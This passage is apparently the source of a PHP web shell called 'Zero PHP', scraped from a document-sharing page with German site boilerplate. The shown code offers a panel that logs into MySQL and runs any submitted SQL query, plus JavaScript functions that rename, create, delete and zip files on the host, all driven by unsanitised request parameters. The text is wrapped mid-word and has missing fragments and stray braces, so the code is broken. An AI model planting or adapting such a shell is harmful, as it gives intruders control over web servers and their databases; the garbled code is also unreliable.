['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass']);
if (!($result=mysqli_query($link
,"show databases"))) {
printf("Error: %s\n", mysqli_err
or($link));
}
while( $row = mysqli_fetch_row(
$result ) ){
if (isset($_POST['mysql_
db'])) {
if ($row[0] == $_POST['m
ysql_db']) {
echo "<option value=
'" . $row[0] . "' selected>" . $row[0] . "</option>";
} else {
echo "<option value=
'" . $row[0] . "'>" . $row[0] . "</option>";
}
} else {
echo "<option value='" . $ro
w[0] . "'>" . $row[0] . "</option>";
}
}
?>
</select><br><br>
<textarea name="mysql_query" style="bord
er: 1px solid #E3052B;height: 200px;box-sizing: border-box; padding: 20px;" plac
eholder="Query"><?php if (isset($_POST['mysql_query'])) { echo $_POST['mysql_que
ry']; } ?></textarea>
<input type="submit" name="execute_mysql
" value="EXECUTE QUERY!">
<?php } else { ?>
<table>
<tr>
<td width="20%">MySQL Se
rver:</td>
ype="text" name="mysql_server" value="localhost" autocomplete="off" spellcheck="
false"></td>
</tr>
<tr>
<td width="20%">User:</t
d>
ype="text" name="mysql_user" autocomplete="off" spellcheck="false"></td>
</tr>
<tr>
<td width="20%">Password
:</td>
ype="text" name="mysql_pass" autocomplete="off" spellcheck="false"></td>
</tr>
</table><br>
<input type="submit" name="connect_mysql
" value="CONNECT!">
</form>
<?php } ?>
<?php if (isset($_POST['connect_mysql'])) {
$server = $_POST['mysql_server'];
$user = $_POST['mysql_user'];
$pass = $_POST['mysql_pass'];
$link = mysqli_connect($server,$user,$pa
ss);
if ($link) {
$_SESSION['mysql_user'] = $user;
$_SESSION['mysql_pass'] = $pass;
$_SESSION['mysql_server'] = $ser
ver;
echo "<script>document.location
= '?view=database';</script>";
} else {
echo "<div class='result'>Could
not connect, check the credential</div>";
}
// if (!($result=mysqli_query($link,$que
ry))) {
// printf("Error: %s\n", mysqli_
error($link));
// }
// while( $row = mysqli_fetch_row( $resu
lt ) ){
// if (($row[0]!="information_schema") &
& ($row[0]!="mysql")) {
// echo $row[0]."\r\n";
// }
// }
} ?>
<?php if (isset($_POST['execute_mysql'])) { ?>
<table class="result" style="overflow: auto;"><?php
$link = mysqli_connect($_SESSION['mysql_
server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass'], $_POST['mysql_db']);
$query = mysqli_query($link, $_POST['mys
ql_query']);
$row = mysqli_fetch_assoc($query);
echo "<tr>";
foreach ($row as $key => $value) {
echo "<td style='border: 2px das
hed #555; padding: 5px;'>" . $key . "</td>";
}
echo "</tr>";
mysqli_data_seek( $query, 0 );
while( $row = mysqli_fetch_assoc( $query ) ) {
echo "<tr>";
foreach ($row as $key => $value) {
echo "<td style='border:
2px dashed #555; padding: 5px;'>" . $value . "</td>";
}
echo "</tr>";
}
?></table>
<?php } ?>
<?php } ?>
</div>
</section>
<footer>Copyright ©ZeroErr0r - <?php echo date('Y') ?></footer>
<script type="text/javascript">
function rename(rename_path, file) {
var to = prompt("Enter a new file name", file);
console.log(to.length);
if (to !== null && to.length > 0) {
document.location = "?from=" + rename_path + "&to=" + to
;
}
}
function touch(touch_path) {
var to = prompt("Enter a file name");
document.location = "?touch=" + touch_path + "&file=" +
to;
}
}
function mkdir(mkdir_path) {
var to = prompt("Enter a folder name");
document.location = "?mkdir_path=" + mkdir_path + "&fold
er=" + to;
}
}
var file_select = document.getElementsByClassName('file_select');
function fileSelectCheck() {
showAction();
for (var i = 0; i < file_select.length; i++) {
if (file_select[i].checked) {
file_select[i].setAttribute('style', 'opacity:1;
');
document.getElementsByClassName('file_select')[i
].parentElement.parentElement.setAttribute('style', "background-color: #1A272E")
;
} else {
file_select[i].setAttribute('style', '');
document.getElementsByClassName('file_select')[i
].parentElement.parentElement.setAttribute('style', '');
}
}
}
function filesDelete() {
var files = [];
var c = 0;
if (s[i].checked) {
files[c] = s[i].value;
c++;
}
}
var q = "", total = 1;
for (var i = 0; i < files.length; i++) {
q += "rmfile" + i + "=" + files[i] + "&";
total++;
}
document.location = "?" + q + "multirmfile=" + total;
}
function filesCompress() {
var files = [];
var c = 0;
if (s[i].checked) {
files[c] = s[i].value;
c++;
}
}
var q = "", total = 0;
for (var i = 0; i < files.length; i++) {
q += "file" + i + "=" + files[i] + "&";
total++;
}
document.location = "?action=zip&" + q + "numfiles=" + total;
}
function toggle(el) {
if (el.nextSibling.nextSibling.getAttribute('class') == 'on') {
el.nextSibling.nextSibling.setAttribute('class', 'off')
} else {
el.nextSibling.nextSibling.setAttribute('class', 'on')
}
}
</script>
<script>hljs.initHighlightingOnLoad();</script>
</body>
</html>

Zero PHP

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Zero PHP

Hochgeladen von

Copyright:

Verfügbare Formate

<?

if (isset($_GET['action']) AND isset($_GET['numfiles']) AND $_GET['action'] == '

<header class="clearfix box">

Das könnte Ihnen auch gefallen